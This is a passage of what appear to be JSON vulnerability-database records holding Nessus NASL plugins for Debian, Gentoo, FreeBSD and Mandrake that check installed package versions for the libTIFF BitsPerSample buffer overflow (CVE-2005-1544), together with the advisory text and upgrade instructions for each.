script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libtiff-tools\", reference:\"3.5.5-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libtiff3g\", reference:\"3.5.5-7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libtiff3g-dev\", reference:\"3.5.5-7\")) 
flag++;\nif (deb_check(release:\"3.1\", prefix:\"tiff\", reference:\"3.7.2-3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:57", "description": "The remote host is affected by the vulnerability described in GLSA-200505-07\n(libTIFF: Buffer overflow)\n\n Tavis Ormandy of the Gentoo Linux Security Audit Team discovered a\n stack based buffer overflow in the libTIFF library when reading a TIFF\n image with a malformed BitsPerSample tag.\n \nImpact :\n\n Successful exploitation would require the victim to open a specially\n crafted TIFF image, resulting in the execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2005-05-11T00:00:00", "title": "GLSA-200505-07 : libTIFF: Buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2005-05-11T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:tiff"], "id": "GENTOO_GLSA-200505-07.NASL", "href": "https://www.tenable.com/plugins/nessus/18233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200505-07.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18233);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1544\");\n script_xref(name:\"GLSA\", value:\"200505-07\");\n\n script_name(english:\"GLSA-200505-07 : libTIFF: Buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200505-07\n(libTIFF: Buffer overflow)\n\n Tavis Ormandy of the Gentoo Linux Security Audit Team discovered a\n stack based buffer overflow in the libTIFF library when reading a TIFF\n image with a malformed BitsPerSample tag.\n \nImpact :\n\n Successful exploitation would require the victim to open a specially\n crafted TIFF image, resulting in the execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200505-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libTIFF users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/tiff-3.7.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/10\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/11\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/tiff\", unaffected:make_list(\"ge 3.7.2\"), vulnerable:make_list(\"lt 3.7.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libTIFF\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:45:00", "description": "A Gentoo Linux Security Advisory reports :\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered a\nstack based buffer overflow in the libTIFF library when reading a TIFF\nimage with a malformed BitsPerSample tag.\n\nSuccessful exploitation would require the victim to open a specially\ncrafted TIFF image, resulting in the execution of arbitrary code.", "edition": 25, "published": "2005-08-01T00:00:00", "title": "FreeBSD : tiff -- buffer overflow vulnerability (68222076-010b-11da-bc08-0001020eed82)", "type": "nessus", 
"bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2005-08-01T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:pdflib", "p-cpe:/a:freebsd:freebsd:linux-tiff", "p-cpe:/a:freebsd:freebsd:ivtools", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:gdal", "p-cpe:/a:freebsd:freebsd:paraview", "p-cpe:/a:freebsd:freebsd:iv", "p-cpe:/a:freebsd:freebsd:ja-libimg", "p-cpe:/a:freebsd:freebsd:tiff", "p-cpe:/a:freebsd:freebsd:pdflib-perl", "p-cpe:/a:freebsd:freebsd:ja-iv", "p-cpe:/a:freebsd:freebsd:fractorama"], "id": "FREEBSD_PKG_68222076010B11DABC080001020EED82.NASL", "href": "https://www.tenable.com/plugins/nessus/19347", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19347);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1544\");\n\n script_name(english:\"FreeBSD : tiff -- buffer overflow vulnerability (68222076-010b-11da-bc08-0001020eed82)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Gentoo Linux Security Advisory reports :\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered a\nstack based buffer overflow in the libTIFF library when reading a TIFF\nimage with a malformed BitsPerSample tag.\n\nSuccessful exploitation would require the victim to open a specially\ncrafted TIFF image, resulting in the execution of arbitrary code.\"\n );\n # http://www.gentoo.org/security/en/glsa/glsa-200505-07.xml\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200505-07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.remotesensing.org/libtiff/v3.7.3.html\"\n );\n # https://vuxml.freebsd.org/freebsd/68222076-010b-11da-bc08-0001020eed82.html\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://www.nessus.org/u?574534cb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:fractorama\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gdal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:iv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ivtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-iv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-libimg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:paraview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pdflib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pdflib-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"tiff<3.7.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-tiff<3.6.1_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"pdflib<6.0.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"pdflib-perl<6.0.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"gdal<1.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ivtools<1.2.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"paraview<2.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"fractorama<1.6.7_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"iv>0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-iv>0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-libimg>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:32", "description": "Stack-based buffer overflow in libTIFF before 3.7.2 allows remote\nattackers to execute arbitrary code via a TIFF file with a malformed\nBitsPerSample tag. 
Although some of the previous updates appear to\nalready catch this issue, this update adds some additional checks.\n\nThe updated packages have been patched to correct this issue.", "edition": 24, "published": "2006-02-19T00:00:00", "title": "Mandrake Linux Security Advisory : libtiff (MDKSA-2006:042)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2006-02-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libtiff3-static-devel", "p-cpe:/a:mandriva:linux:lib64tiff3-devel", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:libtiff3-devel", "p-cpe:/a:mandriva:linux:libtiff-progs", "cpe:/o:mandriva:linux:2006", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005", "p-cpe:/a:mandriva:linux:lib64tiff3", "p-cpe:/a:mandriva:linux:libtiff3", "p-cpe:/a:mandriva:linux:lib64tiff3-static-devel"], "id": "MANDRAKE_MDKSA-2006-042.NASL", "href": "https://www.tenable.com/plugins/nessus/20941", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:042. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20941);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1544\");\n script_xref(name:\"MDKSA\", value:\"2006:042\");\n\n script_name(english:\"Mandrake Linux Security Advisory : libtiff (MDKSA-2006:042)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stack-based buffer overflow in libTIFF before 3.7.2 allows remote\nattackers to execute arbitrary code via a TIFF file with a malformed\nBitsPerSample tag. Although some of the previous updates appear to\nalready catch this issue, this update adds some additional checks.\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff-progs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3-static-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/02/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64tiff3-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64tiff3-devel-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64tiff3-static-devel-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"libtiff-progs-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", 
reference:\"libtiff3-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libtiff3-devel-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libtiff3-static-devel-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64tiff3-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64tiff3-devel-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64tiff3-static-devel-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"libtiff-progs-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libtiff3-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libtiff3-devel-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libtiff3-static-devel-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-devel-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-static-devel-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"libtiff-progs-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libtiff3-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libtiff3-devel-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", 
reference:\"libtiff3-static-devel-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}